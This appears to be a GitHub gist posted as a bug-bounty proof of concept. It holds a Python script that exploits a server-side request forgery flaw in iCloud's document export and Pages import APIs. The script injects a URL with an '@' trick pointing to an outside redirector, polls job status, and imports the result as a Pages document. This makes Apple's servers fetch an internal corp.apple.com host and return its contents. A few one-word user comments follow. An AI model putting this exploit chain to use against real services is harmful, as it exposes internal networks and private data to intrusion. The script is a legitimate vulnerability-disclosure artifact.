Skip to content

Instantly share code, notes, and snippets.

@samwcyo

samwcyo/ssrf Secret

Created Aug 26, 2020
Embed
What would you like to do?
import requests, json
cookies = ''
clientId = ""
dsId = ""
def firstStep(url):
realUrl = "xss.buer.haus/redir.php?url={}".format(url)
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId), data = {
"url": "https://p37-mailws.icloud.com:443@{}".format(realUrl),
"source": "webmail",
"build": "primary"
}, headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print r.headers
return json.loads(r.text)["job_id"]
def secondStep():
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Second: {}".format(r.text)
def thirdStep():
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Three: {}".format(r.text.encode("utf8"))
def fourthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Four: {}".format(r.text)
def fifthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId), data = {
"job_id": jobId,
"name": "text_0%202.txt",
"zone": "com.apple.Pages",
"parent_id": "documents",
"package": "N",
"source": "webmail",
"build":"primary"
}, headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Five: {}".format(r.text)
def sixthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
"Content-Type": "text/plain",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Six: {}".format(r.text)
return r.text
def seventhStep(pageId):
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
"document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
"language":"en-us",
"locale":"en-us",
"timezone":"US/Pacific"
}, headers = {
"Content-Type": "text/plain; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Seven: {}".format(r.text)
return json.loads(r.text)
def eigthPage(data, pageId):
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
"parent_item_id":"documents",
"name":"text_0 2.pages",
"bootstrap_source_id": data["bootstrap_source_id"],
"bootstrap_source_token": data["bootstrap_source_token"],
"delete_import_source_auth_token":"null",
"import_source_document_id":"docws:{}:com.apple.Pages:{}".format(dsId, pageId),
"is_import": True,
"is_open_copy": False,
"language":"en-us",
"locale":"en-us",
"timezone":"US/Pacific",
"zone":"com.apple.Pages"
}, headers = {
"Content-Type": "text/plain; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Eight: {}".format(r.text)
return json.loads(r.text)
def ninthPage(data):
r = requests.get("https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"]), headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Nine: {}".format(r.text)
return json.loads(r.text)
def finalPage(data):
r = requests.get("https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["webservices"]["documentPath"]), headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
return r.text
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def fetchURL(url):
jobId = firstStep(url)
secondStep()
thirdStep()
fourthStep(jobId)
fifthStep(jobId)
while True:
data = sixthStep(jobId)
if "uploading" in data:
continue
pageId = json.loads(data)["result"]["document_id"]
break
data = seventhStep(pageId)
data = eigthPage(data, pageId)
data = ninthPage(data)
out = finalPage(data).encode("utf8")
return out
def clean(content):
content = content.replace("\\n", "\n")
return find_between(content, '<html>', '</html>')
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
url = "http://redacted.corp.apple.com:1234/nexus/redacted"
print clean(fetchURL(url))
@Luigy-Lemon

This comment has been minimized.

Copy link

@Luigy-Lemon Luigy-Lemon commented Oct 8, 2020

cheese

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Oct 9, 2020

cheezy

@m0nk3y-s3c

This comment has been minimized.

Copy link

@m0nk3y-s3c m0nk3y-s3c commented Oct 11, 2020

cheeze

@zer0yu

This comment has been minimized.

Copy link

@zer0yu zer0yu commented Oct 12, 2020

cheesy

@spwn3r49sd3r00

This comment has been minimized.

Copy link

@spwn3r49sd3r00 spwn3r49sd3r00 commented Oct 16, 2020

Holy

@starlingvibes

This comment has been minimized.

Copy link

@starlingvibes starlingvibes commented Oct 19, 2020

Holy

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.